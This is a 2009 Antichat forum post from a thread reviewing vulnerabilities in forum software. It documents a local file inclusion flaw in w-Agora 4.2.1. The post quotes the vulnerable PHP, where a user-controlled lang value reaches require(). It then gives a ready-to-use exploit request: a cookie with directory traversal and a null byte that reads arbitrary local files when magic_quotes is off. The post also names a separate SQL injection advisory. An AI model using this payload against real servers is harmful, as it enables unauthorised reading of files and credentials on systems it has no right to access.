Форум АНТИЧАТ - [Обзор уязвимостей в форумных движках]

#25

28.12.2009, 20:03

RulleR

Reservists Of Antichat - Level 6

Регистрация: 12.06.2008

Сообщений: 157

Провел на форуме:
3217552

Репутация: 1668

Отправить сообщение для RulleR с помощью ICQ

Отправить сообщение для RulleR с помощью Yahoo

w-Agora forum
Web site : http://www.w-agora.com
Version : 4.2.1

Local File Inclusion

Vuln file: globals.inc [str:169]

PHP код:


		
			
/*...*/

if (isset($_GET['lang']) ) {

    $lang = strtolower($_GET['lang']);

} elseif (isset($_POST['lang'])) {

    $lang = $_POST['lang'];

} elseif (isset($_COOKIE['wa_lang'])) {

    $lang = $_COOKIE['wa_lang'];

} elseif (isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ) {

    $lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);

} elseif (isset($_COOKIE['lang'])) {

    $lang = strtolower($_COOKIE['lang']);

}

/*...*/

require ("$lang_dir/lang_$lang.inc");

/*...*/

Exploit:
if magic_quotes = OFF

Код:

GET http://[host]/[path]/index.php HTTP/1.0
Cookie: lang=/../../../../../../[local_file]%00

-------------------------------------------
w-Agora <= 4.2.1 (cat) Remote SQL Injection Vulnerability

Последний раз редактировалось RulleR; 28.12.2009 в 20:06..

Похожие темы

Тема

Автор

Раздел

Ответов

Последнее сообщение

[Обзор уязвимостей vBulletin]

bandera

Форумы

07.06.2010 16:19

[Обзор уязвимостей Phorum]

_-[A.M.D]HiM@S-_

Форумы

23.05.2010 13:42

[Обзор уязвимостей phpBB]

qBiN

Форумы

10.04.2010 23:52

[Обзор уязвимостей myBB]

Goudini

Форумы

04.09.2009 22:13